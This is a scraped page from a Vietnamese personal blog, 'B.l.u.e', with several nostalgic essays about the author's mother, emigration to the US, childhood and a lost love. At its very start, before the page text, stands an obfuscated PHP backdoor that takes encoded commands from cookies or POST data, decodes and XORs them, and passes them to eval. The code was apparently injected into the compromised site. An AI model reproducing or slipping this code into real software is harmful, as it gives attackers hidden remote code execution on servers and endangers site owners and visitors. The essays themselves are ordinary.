$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> mẹ – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: mẹ

em xưa còn thắt bím, nuôi dưỡng thêm ngây thơ

Đa phần khi vừa add nick gái nào, xinh, độc thân trên Facebook xong, anh đều nghĩ rằng mình cần viết bài gì đó, không là những áng văn trác tuyệt thì ít ra cũng phải đôi dòng thơ lãng mạn. Nhưng, xui thay, những lúc ấy, anh ngồi bóp trán cả buổi vẫn không nghĩ ra câu nào khác ngoài những câu cũ rích đại loại như: em, anh thấy khuôn mặt em đẹp, nhưng ngực em còn đẹp hơn, nên chỉ đành thở dài tiếc nuối.

Lại có những khi, chỉ vì vài hình ảnh vu vơ nào đó, lại có hứng viết ra những suy nghĩ miên man trong đầu. Ừ, đôi khi, để tích tụ thứ gì lâu quá cũng không tốt.

Hôm nay, anh lái xe về nhà trên một tuyến đường hoàn toàn khác so với tuyến đường đã đi gần một năm nay. Thật ra việc này đến từ lí do hết sức nhảm nhí: lách qua phải để vượt cái xe đi chậm, rồi khi xin change lane lại qua trái bọn nó không cho, ấy rồi phải chạy thẳng. Có một khúc khi dừng đèn đỏ, anh nhìn ra cửa sổ thấy bên tay trái mình là một hàng cây thấp, và xanh, xanh lắm.

Anh vốn dốt tất cả những gì liên quan đến thực vật học, nên chịu không biết tên nó là gì, nhưng loại cây đó có lá rất giống với lá học bài.
Anh vốn dốt tất cả những gì liên quan đến thực vật học, nên chịu không biết lá học bài tên thật là gì, nhưng đột nhiên anh thấy nhớ nhớ.

Anh nhớ hồi nhỏ thật nhỏ, khi đi học, anh hay chế giễu bọn con gái cứ tới mùa thi lại lấy lá học bài ép vào tập vở, với niềm tin và mong ước mãnh liệt là nó sẽ giúp tăng cái khả năng ghi nhớ của gái. Nhưng khi chúng nó đi khuất, anh lại nhanh tay vặt vài cái, rồi len lén nhét vào cặp.

Một vài năm tháng của tuổi thơ, cái niềm tin ngây ngô ấy đi cùng anh suốt những kì thi; và lạ thay, nó chỉ một cách hết sức thình lình biến mất. Có lẽ nó biến mất vì con người ta phải lớn lên, chứ không vì chúng ta nhận ra điều đó không có thật.

Anh thình lình hạ cửa sổ xuống, bất chấp cái lạnh của trời đông, đưa tay ra ngoài cửa xe, giả vờ nhấp nhấp tay theo nhịp nhạc, rồi, vẫn lén lút như ngày nào, quơ lấy vài chiếc lá, mỉm cười với chính bản thân mình rằng: giờ đây toàn bộ giáo trình nằm trong máy tính, lẽ đâu lại ép vào giữa máy tính chăng?

Anh bồi hồi, không phải vì đoạn kí ức đó, mà là cách bản thân anh nhìn đoạn kí ức đó, như những gì xa xôi không còn có thể chạm tới được…

Tiếng còi của cái xe đậu đằng sau khi đèn xanh mà anh chưa chạy lôi tuột anh về cái hiện tại hổ nhốn, tất bật và đầy bụi bặm, của những lo toan, từ việc học, việc làm, cho tới điều nhỏ nhặt kiểu chạy từ từ, cẩn thận, kẻo đụng vào xe người khác thì đền méo mặt. Anh thở dài vì cái hiện tại này không lâu thì lại chìm vào hồi tưởng khi iPod vang lên giọng Duy Quang

Em xưa còn thắt bím
nuôi dưỡng thêm ngây thơ
Anh xưa còn luýnh quýnh
giữa sân trường trao thư

Anh ước tìm lại được anh của ngày nào, khi trong thư viện viết một mảnh giấy làm quen, lén ném cho cô bé ấy, hồi hộp chờ và thất vọng khi không nhận được hồi âm, để rồi khi về nhà tự chửi mình ngu cả buổi vì mảnh giấy không có thông tin liên lạc gì, thì làm sao cô bé đáp trả.

Anh cũng ước thấy được hình ảnh cô bé cột tóc đuôi gà ngày xưa, mắt đỏ hoe khi nói với anh: quà 8/3 em mua tặng mẹ em, bị bọn anh vô tình quăng vỡ rồi, khi đám bọn anh “đặt nhẹ” cặp của bọn cô ra ngoài, chiếm lấy căn phòng làm chỗ ngủ trưa tại trường; để rồi vài ngày sau, hai má ửng hồng khi anh tặng cành hoa hồng như một món quà làm lành.

Giờ đây, đã không còn anh của lãng mạng trẻ con, lúng túng, ngại ngùng ấy nữa…

Em anh fone nhờ tra giùm nó đường đi tới quán sinh tố, anh định nhân tiện hỏi xem dạo này mẹ thế nào, mà thấy nó vội quá lại thôi. Nhớ tầm 2 tuần trước khi về nhà ăn Thanksgiving, đang đêm anh có việc cần nghe điện thoại, sợ cả nhà thức giấc mới chui ra garage đứng nói chuyện. Trời lúc đó lạnh lắm, trong garage không có hệ thống sưởi, anh mới chui vào trong xe mà ngồi. Giữa cuộc điện thoại ấy, đột nhiên anh nhận ra, anh đang ngồi trong cái xe mà sáng nào mẹ anh cũng lái đi làm. Tay anh đang đặt lên cái vô lăng mà bàn tay gầy gò của mẹ ngày nào cũng nắm lấy. Anh giơ chân mình ướm thử khoảng cách tới thắng và ga, để gắng hình dung hình ảnh mẹ anh lái xe.

Trời, anh thấy thật lạ lẫm, vì ngạc nhiên thay, anh chưa từng thấy mẹ lái xe lần nào.

Anh lớn lên luôn quen với hình ảnh hằng ngày thấy mẹ bán hàng, thấy mẹ nấu cơm, thấy mẹ đi chợ về, thấy mẹ cười vui, thấy mẹ buồn bã… Anh cho dù hiện tại sống xa nhà, vẫn cảm thấy như mẹ anh vẫn là hình ảnh trong trí nhớ bấy lâu, cho đến khoảng khắc đó.

Anh nhìn sang cái hộc trên xe, thấy tấm thẻ nhân viên của mẹ. Anh nhận ra rằng, có quá nhiều hình ảnh của mẹ mà anh đã và đang không được chứng kiến. Anh đột nhiên có cái cảm giác rằng, bằng cách này hay nọ, rồi sẽ có một ngày anh phải hối tiếc vì đã bỏ lỡ những hình ảnh như thế.

Càng ngày khi càng lớn lên, cái suy nghĩ mình cần chở che, bao bọc cho mẹ trong anh ngày càng lớn. Anh thấy buồn khi nghĩ đến bóng mẹ phải lái xe đi làm, anh lo lắng không biết mẹ chạy xe có vững không. Một lần nữa, anh sờ qua vô lăng, hộp số… và lại thấy buồn, buồn với hình ảnh mẹ gầy gò phải xoay trở với cuộc sống vất vả bên này, buồn khi nghĩ đến cảnh mẹ tiếng Anh nói không rành, lạc lõng giữa một đất nước nói một ngôn ngữ xa lạ.

Anh nhớ có lần, mẹ giơ bàn tay lên và nói đùa với anh: mẹ làm công việc sửa máy tính, ngày nào cũng phải vặn ốc, giờ tay chai hết rồi. Từ ngày đó, anh không còn thấy tự hào về bàn tay thon và đẹp của anh nữa.

Thật buồn khi thấy mình lớn lên, và thấy mẹ già đi…

.

khóc

null

Ông bà ngoại hay kể là hồi bé mẹ học rất giỏi. Mẹ thi đậu vào trường Nữ sinh Gia Long với điểm cao. Thế rồi sự kiện 30/4 xảy ra, cả nhà ông bà ngoại phải di tản về quê, mẹ và các anh chị em của mình không ai được đến trường tiếp. Cái thị xã nhỏ, nghèo nàn, việc có một trường tiểu học dạy cho trẻ em biết đọc, biết viết âu cũng là làm hết sức rồi, mơ sao tới được trường trung học đây?

Người ta hay nói mỗi đứa trẻ sinh ra đời đều sinh dưới một vì sao nào đó. Đôi khi tôi hay tự hỏi phải chăng người ta không yêu cầu tất cả thiên thần học về hình học trên thiên đường, nếu không tại sao ngôi sao của mẹ tôi lại được vẽ một cách méo mó đến thế?

Mẹ đi vượt biên, đi ba lần thất bại ba lần. Các em của mẹ lần lượt đi qua Mỹ thành công hết. Mẹ ở lại Việt Nam, mỗi lần nhận hình các em mẹ tốt nghiệp đại học, mẹ cười, nhưng tôi biết mẹ buồn.

***

Trước khi nhà tôi đi Mỹ tầm ba tháng, tôi thấy mẹ khi bán hàng cứ cầm riết cuốn sách Streamline để tự học Anh Văn. Mẹ đã tới rồi cái tuổi trung niên, mẹ tự học nên cứ học trước lại quên sau. Cái cuốn Streamline ấy chỉ nhàu nhàu, nhăn nhúm ở vài chục trang đầu. Qua đây rồi, mỗi lần đi các cửa hàng để mua đồ cuối tuần, gặp chuyện gì cần nói, mẹ toàn phải gọi điện thoại về đưa tôi nói.

Ông ngoại tôi khi qua đây cũng đã hơn sáu mươi, ông vẫn tới trường học. Vì thế ông ngoại khuyến khích mẹ tôi đi học. Nước Mỹ chưa từng ngoác mỏ rêu rao cả ngày rằng: chúng tao rất đề cao giáo dục (hoặc hắn rêu rao trong khi tôi đang nghe rock nên tôi không biết chăng?) nhưng ở đây, mọi người đều có cơ hội đến trường. Tôi đã mấy lần đi vào trong trường mà em tôi đang học, và khá ngạc nhiên vì vẫn có nhiều người đúng tuổi đi học dù điều này tôi từng được nghe kể trước.

Quay lại chủ đề đang nói, mẹ quyết định sẽ đi học, sau giờ làm, chả phải học mấy cái cao xa, chỉ là học Anh Văn để có thể giao tiếp và đọc viết. Cái vấn đề là bạn không thể cứ vác cặp sách rồi chui vào lớp được. Đăng kí học bên này, phải nói chuyện với conseleur, rồi mới thi xếp lớp này nọ để đi học. Mẹ không thể gọi điện nói được, mẹ nhờ tôi. Tôi lên trang web của trường, may mắn thay tìm được số của một conseleur người Việt, tôi đưa cho mẹ để mẹ gọi người ta. Hơn một tuần liền, mẹ gọi, cô đó đang đi nghỉ phép nên không nhận điện. Mẹ gọi cho tôi, mẹ nói tôi gọi số điện thoại của trường để hỏi cho mẹ.

***

Vài hôm trước, mẹ đi làm về sớm, mẹ gọi tôi khi tôi đang ở công ty. Mẹ hỏi tôi đã hỏi cho mẹ chưa. Tôi lười lắm nên trả lời mẹ: thôi mẹ cứ chờ người ta đi nghỉ phép về rồi là nghe điện thoại mẹ ngay mà. Giọng mẹ nghèn nghẹn, mẹ chỉ bảo tôi:
– Nếu trễ thời hạn đăng kí, người ta không cho mẹ đi học thì sao con? Mẹ muốn đi học mà con…
Tôi nghe lòng mình thắt lại. Tôi buồn, rất buồn, và rất hối hận.

Hôm nay, tôi lái về thăm nhà. Mẹ vẫn thế, mẹ quên hết mọi thứ, cứ ngồi giục tôi ăn cơm cho nhanh, cho nhiều vào. Tôi thích ăn canh chua cá lóc, lần nào tôi về mẹ cũng nấu cả nồi để cho tôi. Tôi ăn xong, nằm dài trên sofa chơi game một lúc. Đến khi tôi vào nhà tắm định tắm rồi đi ngủ, khi bước ngang qua phòng mẹ, thấy bóng mẹ ngồi lom khom với cái kim từ điển đang đánh vần từng chữ tiếng Anh, tôi chui vào buồng tắm, xả vòi sen.

Và khóc…
.

oải hương

lavendar

Khi đang ngồi ăn Phở ở quán ăn Việt Nam, Jason có nói với tôi:
– Tao thấy rất thích cách mà dân Việt chúng mày mấy thế hệ sống cùng với nhau trong một nhà…
Khi ấy, tôi đang loay hoay bê tô phở lên húp lấy húp để, chưa kịp đặt xuống trả lời, thì Jason tiếp:
– Như tao, năm tao 18 tuổi, một ngày tao canh bố mẹ tao ra ngoài, tao dọn đồ hết, ra ngoài ở. Sau đó chỉ gọi điện về mà báo: Con dọn ra rồi…
Nhún vai một cái, tôi hỏi:
– Ừ, rồi sao nữa?
Jason trả lời:
– Giờ tao có con mới nghĩ rằng, sau này nếu bọn nó 18 tuổi, bọn nó cũng làm vậy (mà thật ra hầu như bọn thanh niên Mỹ toàn thế – Jason tiếp lời), chắc tao buồn lắm…
Giọng có chút nghẹn ngào, Jason tiếp tục:
– Sống hơn 2/3 đời người rồi, mới thấy đích thực gia đình là quan trọng nhất.

***

Tôi đi làm xa nhà, thật ra cũng chỉ là 250 dặm với bốn tiếng lái xe, nhưng mẹ tôi lúc nào cũng lo lắng như thể tôi đang cầm thanh gươm, xông vào hang rồng để hiếp công chúa, nhầm, để cứu công chúa khỏi bị hiếp tới nơi. Ngày nào mẹ cũng gọi điện hỏi tôi đi làm về chưa, có mệt không, hôm nay ăn món gì, nhớ đi ngủ sớm nhé… Chả hiểu sao, mỗi lần khi tôi nói là nấu ăn xong dọn dẹp mệt lắm, nghe mẹ bảo: con cứ ra ngoài ăn, không đủ tiền thì mẹ cho tiền mà ăn… dù lương tôi hiện tại hơn mẹ nhiều lắm, mẹ phải trả tiền điện tiền nước tiền chợ búa đủ thứ nữa, thì tôi lại thấy mắt mình hoe hoe đỏ.

Cinderella có bài hát rất nổi tiếng: Don’t know what you got (till it’s gone), nhưng có nhiều thứ, chưa cần mất đi, ta vẫn biết là quí giá. Phải không?

***

Tôi lái xe về nhà, tôi ngủ trên chiếc giường chật hẹp. Chiếc giường này vốn là của một người bà con không xài, nhìn cũng còn khá mới. Nó rất hẹp, tôi ngủ mà lăn một vòng là rớt cái bịch xuống đất ngay. Đã thế, nó lại còn ngắn, tôi nằm toàn dư cả cái chân ra thôi. Khi mang nó về, mẹ ái ngại hỏi tôi:
– Thế này con ngủ được không?
đợt đó nhà tôi mới sang, chưa ai có việc làm, thôi thì gắng chịu một xíu cũng được. Tôi mỉm cười gật đầu cho mẹ vui lòng.

Mẹ tôi hay xài nước xả hiệu Downy, mùi hoa oải hương khi giặt đồ. Tôi thì bị viêm xoang từ lâu, tôi dị ứng với mấy mùi như thế. Đó là lí do khi ở nhà, tôi toàn lăn xuống đất hay ra sofa mà ngủ.

***

Bất chợt, đêm qua tôi mới nhận ra tôi thích cái mùi đó đến lạ. Bạn có thể trả lời tôi câu hỏi: tại sao chăn và gối trong căn phòng nhỏ của tôi lúc nào cũng mùi oải hương thơm phức, bất kể là tôi về nhà sau hai, ba hay bốn tuần không? Tôi thì không tin Downy thơm lâu như thế rồi…

Đêm nằm, co người lại, ngửi cái mùi oải hương ấy, chỉ thấy ấm cả lòng…

Hoàng Hải..

ai nhớ ngàn năm một ngón tay…

Anh xấu. Đó là điều đau đớn mà anh thừa nhận, dù đôi khi anh hay tự thủ dâm tinh thần rằng phải loài gái vớ va vớ vẩn đâu mà cứ suốt ngày quan tâm tới nhan sắc. Nhưng anh tự thừa nhận thế. Hai điều hiếm hoi anh hài lòng ở mình là chiều cao 1m78 và đôi bàn tay thon dài của mình.

***

Khi còn quen em, điều anh thích nhất khi chat webcam với em là việc em cứ phụng phịu đôi má béo ú của mình, giọng đầy nhõng nhẽo ngọng ngịu nói:
– Ghét ghê! Người gì đâu mà tay dài và thon còn hơn tay con gái á.
Trăm lần như một, anh sẽ trả lời:
– Chứ đâu tay ngắn cũn cỡn lại mũm mĩm như tay em
và vội chèn thêm câu – mà nếu bọn bạn anh nghe, ắt sẽ gọi là lừa tình:
– Tay anh thon và dài, để nắm tay em cho chặt á…

***

Khi còn quen em, anh thích cách em nghiêm túc nhìn anh và nói:
– Sau này chán nhau, chỉ cần nhắm mắt lại, chớ đừng buông tay nhau ra…

Anh và em chia tay hoàn toàn là lỗi của anh. Em buông tay anh ra trước, nhưng tại anh, bàn tay anh quá thon dài và mỏng manh, không đủ sức níu giữ em.

Khi nghe tiếng em nức nở nói lời xin lỗi, cũng như khi gọi em chỉ để nói với em một câu khe khẽ: thank you for loving me… anh đều nhìn bàn tay anh đến xuất thần.

Buông nhau ra thật rồi.

***

Công ty anh ai cũng ngạc nhiên hỏi anh: mày khùng hay sao mà tháng nào cũng lái hơn 1000 miles chỉ để chạy về nhà rồi chạy lên.

Lái xe 8 tiếng cả đi cả về hoàn toàn không bao giờ là công việc gây hứng thú, trái lại nó luôn làm cho người anh rã rời. Cứ mỗi lần nghĩ tới đoạn đường đó, anh chỉ muốn phát ốm. Ban đầu anh không tìm được câu trả lời nào thích hợp mỗi khi có ai hỏi câu đó. Chả thằng con trai nào thừa nhận là nhớ mẹ trước mặt người khác.

Hôm nay ăn tối xong, ngồi với mẹ ngoài sofa. Ngoài trời mưa gió bão bùng, sấm chớp sáng cả bầu trời. Đã bao lâu rồi, khi nắm tay mẹ, anh mới nhận ra, bàn tay mẹ gầy quá, nhỏ quá, lại sần sùi đầy những vết chai…

1000 miles / tháng, 16 tiếng lái xe đi về / tháng, chỉ để nắm chặt bàn tay mẹ. Lí do đó là đủ…

Góc phố còn treo đôi mắt bão
Ai nhớ ngàn năm một ngón tay…

(Du Tử Lê)

300510
B.l.u.e

Tay anh :” />
.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.